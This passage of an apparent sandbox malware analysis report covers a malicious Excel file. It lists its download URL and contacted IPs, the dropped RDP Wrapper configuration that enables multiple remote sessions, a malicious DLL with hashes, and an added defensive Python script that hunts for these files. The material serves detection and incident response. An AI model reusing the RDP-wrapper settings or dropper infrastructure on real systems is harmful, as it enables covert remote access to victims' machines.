        | https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
        | http://lankarecipes.com/mages.jpg | 0% | Avira URL Cloud | safe |
        | http://lankarecipes.com/mages.jp | 0% | Avira URL Cloud | safe |
        | https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
        | https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
        | https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe |
        | https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
        | https://wus2-000.pagecontentsync. | 0% | URL Reputation | safe |
        | https://go.micro | 0% | URL Reputation | safe |
        | https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
        | https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
        | https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
        | https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
        | https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
        | https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
        | http://stascorp.comDVarFileInfo$ | 0% | Avira URL Cloud | safe |
        | https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
        | https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe |
        | https://ncus-000.contentsync. | 0% | URL Reputation | safe |
        | https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
        | https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |

        Domains and IPs

        Contacted Domains

        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|---|
        | lankarecipes.com | 192.185.236.165 | true | true | | unknown |

        Contacted URLs

        | Name | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|
        | http://lankarecipes.com/mages.jpg | false | Avira URL Cloud: safe | unknown |

          URLs from Memory and Binaries

        | Name | Source | Malicious | Antivirus Detection | Reputation |
        |---|---|---|---|---|
        | https://api.diagnosticssdf.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://login.microsoftonline.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://shell.suite.office.com:1443 | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://autodiscover-s.outlook.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://cdn.entity. | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://api.addins.omex.office.net/appinfo/query | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://wus2-000.contentsync. | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://clients.config.office.net/user/v1.0/tenantassociationkey | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://powerlift.acompli.net | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://rpsticket.partnerservices.getmicrosoftkey.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://lookup.onenote.com/lookup/geolocation/v1 | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://cortana.ai | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://cloudfiles.onenote.com/upload.aspx | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://entitlement.diagnosticssdf.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://api.aadrm.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://ofcrecsvcapi-int.azurewebsites.net/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | Avira URL Cloud: safe | unknown |
        | https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://api.microsoftstream.com/api/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://cr.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | http://lankarecipes.com/mages.jp | PowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.dr | true | Avira URL Cloud: safe | unknown |
        | https://portal.office.com/account/?ref=ClientMeControl | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmp | false | | high |
        | https://ecs.office.com/config/v2/Office | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://graph.ppe.windows.net | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://res.getmicrosoftkey.com/api/redemptionevents | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://powerlift-frontdesk.acompli.net | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://tasks.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://officeci.azurewebsites.net/api/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | Avira URL Cloud: safe | unknown |
        | https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://store.office.cn/addinstemplate | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp | false | | high |
        | https://wus2-000.pagecontentsync. | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://go.micro | powershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
        | https://outlook.office.com/autosuggest/api/v1/init?cvid= | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://globaldisco.crm.dynamics.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://store.officeppe.com/addinstemplate | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://dev0-api.acompli.net/autodetect | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://www.odwebp.svc.ms | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://api.powerbi.com/v1.0/myorg/groups | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://web.microsoftstream.com/video/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://graph.windows.net | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://dataservice.o365filtering.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://officesetup.getmicrosoftkey.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://analysis.windows.net/powerbi/api | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://prod-global-autodetect.acompli.net/autodetect | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | http://stascorp.comDVarFileInfo$ | Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.dr | false | Avira URL Cloud: safe | low |
        | https://outlook.office365.com/autodiscover/autodiscover.json | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp | false | | high |
        | https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | http://weather.service.msn.com/data.aspx | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://apis.live.net/v5.0/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://github.com/syohex/java-simple-mine-sweeperC: | Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp | false | | high |
        | https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://management.azure.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://incidents.diagnostics.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://clients.config.office.net/user/v1.0/ios | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://insertmedia.bing.office.net/odc/insertmedia | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://o365auditrealtimeingestion.manage.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://outlook.office365.com/api/v1.0/me/Activities | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://api.office.net | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://incidents.diagnosticssdf.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://asgsmsproxyapi.azurewebsites.net/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | Avira URL Cloud: safe | unknown |
        | https://clients.config.office.net/user/v1.0/android/policies | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://entitlement.diagnostics.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://outlook.office.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://storage.live.com/clientlogs/uploadlocation | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://templatelogging.office.com/client/log | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://outlook.office365.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://webshell.suite.office.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://management.azure.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://ncus-000.contentsync. | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://login.windows.net/common/oauth2/authorize | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | URL Reputation: safe | unknown |
        | https://graph.windows.net/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://api.powerbi.com/beta/myorg/imports | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://devnull.onenote.com | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
        | https://messaging.office.com/ | 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr | false | | high |
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://augloop.office.com/v21C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://skyapi.live.net/Activity/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.236.165 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
37.46.150.86 | unknown | Moldova Republic of | 8758 | IWAYCH | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 337287
Start date: 08.01.2021
Start time: 09:32:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 18s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Telex06012020.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 35
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 38.9% (good quality ratio 11.2%)
• Quality average: 20.5%
• Quality standard deviation: 34.4%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.23, 52.109.8.24, 104.43.193.48, 51.11.168.160, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 52.155.217.156, 13.64.90.137, 20.54.26.129, 52.255.188.83
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:34:46 | API Interceptor | 49x Sleep call for process: powershell.exe modified
09:35:06 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
09:35:19 | API Interceptor | 591x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

                                                                                                                                                            W08347.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.117.218
                                                                                                                                                            https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                                                                                                                                                            • 162.144.40.98
                                                                                                                                                            http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                                                                                                                                                            • 162.241.101.253
                                                                                                                                                            8G9b9FXspm.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.219.113
                                                                                                                                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.185.131.105

JA3 Fingerprints

No context

Dropped Files

Match: C:\Program Files\Microsoft DN1\sqlmap.dll
Associated Sample Name / URL (Detection: malicious for every entry; Context: none):
• Order Inquiry.exe
• New Order.exe
• PR E-2012513 SMT PART SUPPLY.xlsx.exe
• xVngcLqeWG.exe
• 9By1j8TSMG.exe
• SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exe
• Parcel_Slip_&_Address_Form.xls
• SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exe
• SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtf
• newbinx.exe
• my_client_specification.exe
• Listings of Items pdf Specifications pdf.exe
• Purchasing Order.exe
• Order #DCF 465789.exe
• uPg8j4T6A9.exe
• New order samples #8495.exe
• xE08uG0aqO.exe
• OfRRJlmMtZ.exe
• PO-HH00890.exe
• Po Shkm120022019 order confirmation.exe

Created / dropped Files

C:\Program Files\Microsoft DN1\rdpwrap.ini
Process: C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 181846
Entropy (8bit): 5.421809355655133
Encrypted: false
SSDEEP: 768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
MD5: 6BC395161B04AA555D5A4E8EB8320020
SHA1: F18544FAA4BD067F6773A373D580E111B0C8C300
SHA-256: 23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
SHA-512: 679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
Malicious: false
Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
C:\Program Files\Microsoft DN1\sqlmap.dll
Process: C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 116736
Entropy (8bit): 5.884975745255681
Encrypted: false
SSDEEP: 3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5: 461ADE40B800AE80A40985594E1AC236
SHA1: B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256: 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512: 421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious: true
Antivirus:
• Metadefender, Detection: 22%
• ReversingLabs, Detection: 41%
Joe Sandbox View (same file seen in earlier analyses, all detected malicious):
• Order Inquiry.exe
• New Order.exe
• PR E-2012513 SMT PART SUPPLY.xlsx.exe
• xVngcLqeWG.exe
• 9By1j8TSMG.exe
• SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exe
• Parcel_Slip_&_Address_Form.xls
• SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exe
• SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtf
• newbinx.exe
• my_client_specification.exe
• Listings of Items pdf Specifications pdf.exe
• Purchasing Order.exe
• Order #DCF 465789.exe
• uPg8j4T6A9.exe
• New order samples #8495.exe
• xE08uG0aqO.exe
• OfRRJlmMtZ.exe
• PO-HH00890.exe
• Po Shkm120022019 order confirmation.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
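The two files dropped into C:\Program Files\Microsoft DN1 deserve a targeted check on any host that opened this document. The preview of rdpwrap.ini identifies it as an RDP Wrapper Library configuration whose [SLInit] and [SLPolicy] sections set remote connections and multiple sessions to 1, and sqlmap.dll is the PE32+ DLL dropped beside it by the same Test3.jpg process. The report marks the .ini itself Malicious: false, which is correct for a plain text file but says nothing about what that configuration enables once the DLL is loaded. The script below is an added example for this report, not Joe Sandbox tooling: it carries the two file paths and their MD5/SHA-256 values copied from the entries above, hashes whatever sits at those paths, and parses an rdpwrap.ini to list the policy flags set to 1. The INI text embedded in it is constructed from the report's truncated Preview field (with the `..` line-break markers expanded), so its hash will not equal the report's, and the choice of which keys count as risky is the example's own, based on the key names.

```python
"""Hunt for the RDP Wrapper artifacts this report lists under
C:\\Program Files\\Microsoft DN1 and flag the policy settings in rdpwrap.ini.

Added example for this report (not Joe Sandbox tooling). IOC values are
copied from the report's Created / dropped Files entries. The INI text is
a constructed sample rebuilt from the report's truncated Preview field,
so hashing it will not reproduce the report's MD5/SHA-256.
"""
import configparser
import hashlib
import os
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DroppedFileIOC:
    path: str
    size: int
    md5: str
    sha256: str


# Paths, sizes and digests copied from the report (digests lower-cased).
IOCS = (
    DroppedFileIOC(r"C:\Program Files\Microsoft DN1\rdpwrap.ini", 181846,
                   "6bc395161b04aa555d5a4e8eb8320020",
                   "23390dfcda60f292ba1e52abb5ba2f829335351f4f9b1d33a9a6ad7a9bf5e2be"),
    DroppedFileIOC(r"C:\Program Files\Microsoft DN1\sqlmap.dll", 116736,
                   "461ade40b800ae80a40985594e1ac236",
                   "798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4"),
)


def hash_bytes(data: bytes) -> Tuple[str, str]:
    """Lower-case MD5 and SHA-256 hex digests of data."""
    return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()


def classify(ioc: DroppedFileIOC, data: Optional[bytes]) -> str:
    """'absent' if the file is missing, 'match' if both digests equal the
    report's, otherwise 'present-different'. A file at this path with other
    content is still worth triage: the report documents only one build."""
    if data is None:
        return "absent"
    return "match" if hash_bytes(data) == (ioc.md5, ioc.sha256) else "present-different"


def hunt(iocs=IOCS) -> Dict[str, str]:
    """Check each IOC path on this host and return path -> classification."""
    results = {}
    for ioc in iocs:
        data = None
        if os.path.isfile(ioc.path):
            with open(ioc.path, "rb") as fh:
                data = fh.read()
        results[ioc.path] = classify(ioc, data)
    return results


# Constructed from the report's Preview of rdpwrap.ini; not the full 181846-byte file.
RDPWRAP_INI_SAMPLE = r"""; RDP Wrapper Library configuration
; Do not modify without special knowledge.

[Main]
Updated=2020-08-25
LogFile=\rdpwrap.txt
SLPolicyHookNT60=1
SLPolicyHookNT61=1

[SLInit]
bServerSku=1
bRemoteConnAllowed=1
bFUSEnabled=1
bAppServerAllowed=1
bMultimonAllowed=1
lMaxUserSessions=0
ulMaxDebugSessions=0
bInitialized=1

[SLPolicy]
TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1
TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1
"""

# Example's own selection: keys whose value 1 present the host as a server
# SKU that allows remote and multiple simultaneous Terminal Services sessions.
RISKY_FLAGS = {
    "SLInit": ("bServerSku", "bRemoteConnAllowed", "bAppServerAllowed"),
    "SLPolicy": ("TerminalServices-RemoteConnectionManager-AllowRemoteConnections",
                 "TerminalServices-RemoteConnectionManager-AllowMultipleSessions"),
}


def risky_rdp_settings(ini_text: str) -> List[str]:
    """Return 'Section.Key' for every risky flag set to 1 in the INI text."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep the mixed-case key names as written
    cp.read_string(ini_text)
    found = []
    for section, keys in RISKY_FLAGS.items():
        for key in keys:
            if cp.get(section, key, fallback="0").strip() == "1":
                found.append(f"{section}.{key}")
    return found


if __name__ == "__main__":
    for path, state in hunt().items():
        print(f"{state:18} {path}")
    print("risky rdpwrap.ini settings in the constructed sample:")
    for flag in risky_rdp_settings(RDPWRAP_INI_SAMPLE):
        print("  ", flag)
```

Run it as an administrator on a suspect host; a "present-different" result for either path is not a clean bill of health, since the directory name alone (Microsoft DN1 under Program Files, created by a process named Test3.jpg) does not belong to any Microsoft product. On a live rdpwrap.ini, feed the file contents to `risky_rdp_settings` to see which session limits the wrapper has been told to lift.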
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1C667E71-DE7F-40D0-8C7D-A76533AF53EA
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
